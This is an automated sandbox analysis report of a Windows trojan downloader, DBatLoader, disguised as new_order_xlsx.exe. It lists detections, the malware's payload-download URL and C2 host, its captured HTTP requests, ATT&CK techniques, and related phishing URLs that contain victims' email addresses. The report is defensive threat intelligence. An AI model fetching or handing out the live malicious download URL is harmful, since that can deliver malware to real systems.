
Windows Analysis Report
new_order_xlsx.exe

Overview

General Information

Sample Name: new_order_xlsx.exe
Analysis ID: 1303012
MD5: ef6025979e7e27041ef72650fdbe8630
SHA1: 8ac15cf845249b2a7c9c095808153656579b1704
SHA256: 5c8d558572c445f5fdadc3758c208654d7dd2787a73a2a1e1757e87dd19d6fad
Tags: exe

Detection

DBatLoader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected DBatLoader
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Initial sample is a PE file and has a suspicious name
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • new_order_xlsx.exe (PID: 6804 cmdline: C:\Users\user\Desktop\new_order_xlsx.exe MD5: EF6025979E7E27041EF72650FDBE8630)
  • cleanup
{"Download Url": "https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf"}
Source | Rule | Description | Author | Strings
new_order_xlsx.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

Source | Rule | Description | Author | Strings
0.3.new_order_xlsx.exe.23e52ec.123.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.3.new_order_xlsx.exe.23e5580.125.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.3.new_order_xlsx.exe.23e2b58.117.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.0.new_order_xlsx.exe.400000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.3.new_order_xlsx.exe.23e502c.121.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
No Sigma rule has matched
No Snort rule has matched

              AV Detection

Source: new_order_xlsx.exe | Avira: detected
Source: new_order_xlsx.exe | Malware Configuration Extractor: DBatLoader {"Download Url": "https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf"}
Source: new_order_xlsx.exe | ReversingLabs: Detection: 78%
Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZ | Avira URL Cloud: Label: malware
Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfy | Avira URL Cloud: Label: malware
Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~() | Avira URL Cloud: Label: malware
Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfk | Avira URL Cloud: Label: malware
Source: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf | Avira URL Cloud: Label: malware
Source: https://balkancelikdovme.com/L | Avira URL Cloud: Label: malware
Source: new_order_xlsx.exe | Joe Sandbox ML: detected
Source: new_order_xlsx.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49739 version: TLS 1.2

              Networking

Source: Malware configuration extractor | URLs: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf
Source: global traffic | HTTP traffic detected (the same request was observed 18 times):
    GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: balkancelikdovme.com
Source: Joe Sandbox View | ASN Name: GYRONGB GYRONGB
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: global traffic | HTTP traffic detected (18 responses, identical apart from the date header; server dates run from 14:36:09 to 14:38:59 GMT at roughly 10-second intervals):
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 708
    date: Mon, 04 Sep 2023 14:36:09 GMT
      (later responses: 14:36:19, 14:36:29, 14:36:39, 14:36:49, 14:36:59, 14:37:09, 14:37:19, 14:37:30, 14:37:39, 14:37:49, 14:37:59, 14:38:09, 14:38:19, 14:38:29, 14:38:39, 14:38:48, 14:38:59 GMT)
    vary: User-Agent
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: new_order_xlsx.exe, 00000000.00000002.632330900.000000000019B000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://://t.exet.exe
Source: new_order_xlsx.exe, 00000000.00000002.632555701.000000000086D000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000086D000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.296724807.0000000000853000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: new_order_xlsx.exe, 00000000.00000003.230488014.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230388318.00000000023AC000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230629064.00000000023E1000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.633865481.0000000003629000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230353890.00000000035EA000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230689886.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230595125.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230526584.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230455265.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231207375.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231339439.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230570843.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230792106.0000000002406000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230295494.0000000003514000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231068363.00000000023E4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
Source: new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://balkancelikdovme.com/L
Source: new_order_xlsx.exe, 00000000.00000002.634603198.0000000009676000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000088D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf
Source: new_order_xlsx.exe, 00000000.00000003.339620607.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZ
Source: new_order_xlsx.exe, 00000000.00000002.632555701.0000000000846000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfk
Source: new_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfy
Source: new_order_xlsx.exe, 00000000.00000002.632555701.00000000007F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~()
Source: new_order_xlsx.exe, 00000000.00000002.632555701.000000000079A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://balkancelikdovme.com/l
Source: unknown | DNS traffic detected: queries for: balkancelikdovme.com
Source: global traffic | HTTP traffic detected (the same request was observed 18 times):
    GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: balkancelikdovme.com
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49701 version: TLS 1.2
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.000000000079A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Source: initial sample, Static PE information: Filename: new_order_xlsx.exe
              Source: new_order_xlsx.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: new_order_xlsx.exe, 00000000.00000003.230488014.0000000002418000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, Section loaded: archiveint.dll
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, Section loaded: system.dll
              Source: new_order_xlsx.exe, ReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, File read: C:\Users\user\Desktop\new_order_xlsx.exe
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: classification engineClassification label: mal92.troj.winEXE@1/0@18/1
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: new_order_xlsx.exeStatic file information: File size 1516544 > 1048576

              Data Obfuscation

              barindex
              Source: Yara match, File source: new_order_xlsx.exe, type: SAMPLE
              Source: Yara match, File source: 0.3.new_order_xlsx.exe.23e52ec.123.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.3.new_order_xlsx.exe.23e5580.125.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.3.new_order_xlsx.exe.23e2b58.117.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.0.new_order_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.3.new_order_xlsx.exe.23e502c.121.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.2.new_order_xlsx.exe.3600000.3.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.3.new_order_xlsx.exe.23e1148.115.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.3.new_order_xlsx.exe.23e0e6c.114.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.3.new_order_xlsx.exe.23e1148.116.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3D06 push ss; retf 0_3_034F3D0B
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3D18 push eax; retf 0_3_034F3D1B
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3110 push eax; ret 0_3_034F3111
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F1DD8 push edi; ret 0_3_034F1DE3
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F2227 push esp; ret 0_3_034F223C
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034F3CD8 push esp; retf 0014h0_3_034F3CDB
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_0355CF54 push eax; ret 0_3_0355CF90
              Source: C:\Users\user\Desktop\new_order_xlsx.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\new_order_xlsx.exe TID: 6872, Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Desktop\new_order_xlsx.exe TID: 6872, Thread sleep time: -30000s >= -30000s
              Source: new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
              Source: new_order_xlsx.exe, 00000000.00000003.339620607.0000000000823000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.632555701.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWG
              Source: new_order_xlsx.exe, 00000000.00000002.632555701.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
              Tactic: techniques (number of matching signatures in parentheses)
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
              Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows)
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
              Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
              Defense Evasion: Virtualization/Sandbox Evasion (1); DLL Side-Loading (1); Obfuscated Files or Information (1); Binary Padding
              Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS
              Discovery: Security Software Discovery (1); Virtualization/Sandbox Evasion (1); System Information Discovery (1); Remote System Discovery (1)
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
              Collection: Input Capture (1); Data from Removable Media; Data from Network Shared Drive; Input Capture
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
              Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Ingress Tool Transfer (3)
              Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
              Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
              Impact: Modify System Partition; Device Lockout; Delete Device Data

              Source | Detection | Scanner | Label
              new_order_xlsx.exe | 79% | ReversingLabs | Win32.Trojan.Leonem
              new_order_xlsx.exe | 100% | Avira | TR/AD.DelfDownloader.evrog
              new_order_xlsx.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              Source | Detection | Scanner | Label
              http://://t.exet.exe | 0% | Avira URL Cloud | safe
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZ | 100% | Avira URL Cloud | malware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfy | 100% | Avira URL Cloud | malware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~() | 100% | Avira URL Cloud | malware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfk | 100% | Avira URL Cloud | malware
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf | 100% | Avira URL Cloud | malware
              https://balkancelikdovme.com/L | 100% | Avira URL Cloud | malware
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              balkancelikdovme.com | 185.181.116.217 | true | true | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf | true | Avira URL Cloud: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://balkancelikdovme.com/L | new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://balkancelikdovme.com/l | new_order_xlsx.exe, 00000000.00000002.632555701.000000000079A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.339620607.000000000083D000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://://t.exet.exe | new_order_xlsx.exe, 00000000.00000002.632330900.000000000019B000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/JquktppcwwfZ | new_order_xlsx.exe, 00000000.00000003.339620607.0000000000876000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfy | new_order_xlsx.exe, 00000000.00000002.632555701.0000000000851000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                http://www.pmail.com | new_order_xlsx.exe, 00000000.00000003.230488014.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230388318.00000000023AC000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230629064.00000000023E1000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.633865481.0000000003629000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230353890.00000000035EA000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230689886.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230595125.0000000002418000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230526584.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230455265.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231207375.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231339439.00000000023E5000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230570843.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230792106.0000000002406000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.230295494.0000000003514000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.231068363.00000000023E4000.00000004.00001000.00020000.00000000.sdmp | false | | high
                https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf~() | new_order_xlsx.exe, 00000000.00000002.632555701.00000000007F4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfk | new_order_xlsx.exe, 00000000.00000002.632555701.0000000000846000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    185.181.116.217 | balkancelikdovme.com | United Kingdom | 29017 | GYRONGB | true
                    Joe Sandbox Version:38.0.0 Beryl
                    Analysis ID:1303012
                    Start date and time:2023-09-04 16:34:53 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 11m 11s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: new_order_xlsx.exe
Detection: MAL
Classification: mal92.troj.winEXE@1/0@18/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, ris.api.iris.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, eudb.ris.api.iris.microsoft.com, tse1.mm.bing.net, arc.msn.com
• Execution Graph export aborted for target new_order_xlsx.exe, PID 6804 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: new_order_xlsx.exe
No simulations
Match: 185.181.116.217
Associated Sample Name / URL | Detection | Threat Name | Context
r096teIe1H.exe | malicious | DBatLoader | balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
r096teIe1H.exe | malicious | DBatLoader | balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
Match: balkancelikdovme.com
Associated Sample Name / URL | Detection | Threat Name | Context
r096teIe1H.exe | malicious | DBatLoader | 185.181.116.217
r096teIe1H.exe | malicious | DBatLoader | 185.181.116.217
0vJrK0NCd1.exe | malicious | Remcos, DBatLoader, FloodFix | 185.181.116.217
Match: GYRONGB
Associated Sample Name / URL | Detection | Threat Name | Context
r096teIe1H.exe | malicious | DBatLoader | 185.181.116.217
r096teIe1H.exe | malicious | DBatLoader | 185.181.116.217
0vJrK0NCd1.exe | malicious | Remcos, DBatLoader, FloodFix | 185.181.116.217
CX17SY6xF6.exe | malicious | Pushdo | 83.223.113.46
PIyT9A3jfC.exe | malicious | Pushdo | 83.223.113.46
nhVJ8J5qOt.exe | malicious | Pushdo | 83.223.113.46
fs7AQcREFX.exe | malicious | Pushdo | 83.223.113.46
https://farma-net.com/admin/auth?userid=rob.mayberry@gelita.com | malicious | HTMLPhisher | 89.145.93.101
IrJyqwDp6P.elf | malicious | Mirai, Moobot | 83.223.101.7
6gjnnBAbpc.exe | malicious | Pushdo | 83.223.113.46
sora.arm7.elf | malicious | Mirai | 83.223.101.9
iJzpyjAehB.exe | malicious | Pushdo | 83.223.113.46
EksRd2mRLH.exe | malicious | Pushdo, DanaBot, SmokeLoader | 83.223.113.46
rLDmqbpt5D.exe | malicious | Pushdo, DanaBot, RedLine, SmokeLoader | 83.223.113.46
irLUxBeO3j.elf | malicious | Mirai | 212.113.144.7
d4bNCWDk1F.exe | malicious | Pushdo | 83.223.113.46
file.exe | malicious | Pushdo, DanaBot, SmokeLoader | 83.223.113.46
https://s3.amazonaws.com/appforest_uf/f1673569031431x837044964462498200/index.xhtml?17373464282007070576159867576718836072896596236213191414781774633016138409263067560810655664611593768691127511520387902715816470054901430985217113983744921341215241681383688426527535794966000143072299496022028714025186539246245021092115024781420437166872573917715270671544911886953886795996849529998276450=!!ERROR%20IN%20FUNCTION%20PARAMETERS!!%20'boyd.eastman@imail.org'%20ist%20kein%20g%C3%BCltiger%20Integerwert&1765620972=Ym95ZC5lYXN0bWFuQGltYWlsLm9yZw==&1/16/202318961133127049864077866167768198212901460441750214020786111898549251534145544273852461499171043240208500698254918200574448252831614537487276212299050019524818481725182239195411702340331216281502686321309755971688813861&email=boyd.eastman@imail.org&2048532416162595706016219186831446773579524518014200612466611761644571231872529944108636910539217157238248758958712136946159490521927112180269811067101566160108479243853193319321023555707545963759105821172180882197934179314148125212682089161392996891286741775134210235114693034421458487518136059350121079991895186634721265116660=138892235 | malicious | HTMLPhisher | 83.223.113.113
1EsDtA4mep.exe | malicious | Pushdo | 83.223.113.46
Match: ce5f3254611a8c095a3d821d44539877
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | SmokeLoader | 185.181.116.217
cv4TCGxUjvS.exe | malicious | KnightCrypt | 185.181.116.217
8_0.exe | malicious | KnightCrypt | 185.181.116.217
cv4TCGxUjvS.exe | malicious | Unknown | 185.181.116.217
8_0.exe | malicious | Unknown | 185.181.116.217
